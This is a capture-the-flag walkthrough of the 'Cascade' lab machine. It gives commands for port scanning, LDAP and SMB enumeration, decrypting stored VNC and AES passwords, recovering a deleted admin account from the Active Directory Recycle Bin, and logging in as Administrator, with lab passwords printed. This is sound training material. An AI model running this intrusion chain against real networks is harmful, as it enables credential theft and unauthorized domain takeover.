The article provides a step-by-step guide to port scanning, LDAP interaction, password decryption, and recovery of deleted objects. The material is useful for information security professionals who want to improve their pentesting and vulnerability research skills in corporate networks.
This machine has an IP address of, which we add to /etc/hosts. book.htb
First, a scan of open ports is performed. Since scanning all ports with nmap takes a long time, masscan is used for the initial stage. The scan covers all TCP and UDP ports via the tun0 interface at a rate of 500 packets per second.
masscan -e tun0 -p1-65535,U:1-65535 --rate=500
There are many ports open on the host. Now let’s scan them with nmap to filter and select the ones we need.
nmap cascade.htb -p49172,49157,49154,135,53,5985,636,389,139,49155,445,3269,3268,49158,88
Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.
nmap -A cascade.htb -p49172,49157,49154,135,53,5985,636,389,139,49155,445,3269,3268,49158,88
First of all, we start with enum4linux enumeration of SMB.
enum4linux -a cascade.htb
We keep a list of users and their group memberships. Let’s see what LDAP has to offer.
We use JXplorer to work with LDAP. Let’s connect and see all the objects.
For user Ryan Thompson, we find the cascadeLegacyPwd attribute.
We decode the base64 and get the password.
Once you have the credentials, you can check the available SMB resources using CrackMapExec.
cme smb cascade.htb -u "r.thompson" -p "rY4n5eva" --shares
Let’s connect to the Data resource.
smbclient -U r.thompson //
We review everything that is recursive.
Now you should download these files and view their contents.
get "IT\Email Archives\Meeting_Notes_June_2018.html" get "IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log" get IT\Logs\DCs\dcdiag.log get "IT\Temp\s.smith\VNC Install.reg"
The first file talks about network migration and that the TempAdmin password is the same as the regular administrator password.
From the second file, we will note the rights of the ArkSvc user.
There is nothing interesting in the third file. But in the fourth we find the VNC password for the user s.smith.
The password is decoded using vncpasswd. To do this, you need to specify the -d parameter (decode password) and pass it in Hex form.
vncpasswd.py -d -H 6bcf2a4b6e5aca0f
evil-winrm -i cascade.htb -u s.smith -p sT333ve2
Let’s look at the SMB resources of this user:
cme smb cascade.htb -u s.smith -p sT333ve2 --shares
Available resource Audit$
smbclient -U s.smith //$
We’ll download everything we have.
Among the downloaded files is a database, by opening it you can click on the credentials in the LDAP table.
We decompile the program using dnSpy. We find the section of code where the password is read from the database and passed to the decryption function. This function also passes the key needed to decrypt the password.
By decompiling the library, we learn about the encryption mode and initialization vector.
So, we have the following parameters:
Now you need to decrypt the password. To do this, you can use the CyberChef tool, which allows you to perform the necessary operations online.
Once the password is obtained, we can see from the enum4linux results that this user belongs to the Remote Management Users and AD Recycle Bin groups. As we know, this user played a role for moving objects.
In addition, the TempAdmin user had the same password as the administrator, but his account was deleted.
Now let’s check the deleted objects in the Active Directory Recycle Bin for the possibility of recovering the account or retrieving further data.
Get-ADObject -IncludeDeletedObjects -Filter {IsDeleted -eq $True}
We find the desired object in the Active Directory Recycle Bin. Now we get its attributes for further analysis and possible account recovery.
Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects -Properties *
Decode the password.
Let’s connect to WinRM and pick up the flag.
evil-winrm -i cascade.htb -u Administrator -p baCT3r1aN00dles
The article examines the process of gaining access to a system through vulnerabilities and subsequent privilege escalation. Special attention is paid to password decryption using CascCrypto.dll and tools such as CyberChef. The final stage was the study of deleted objects in the Active Directory Recycle Bin to restore access.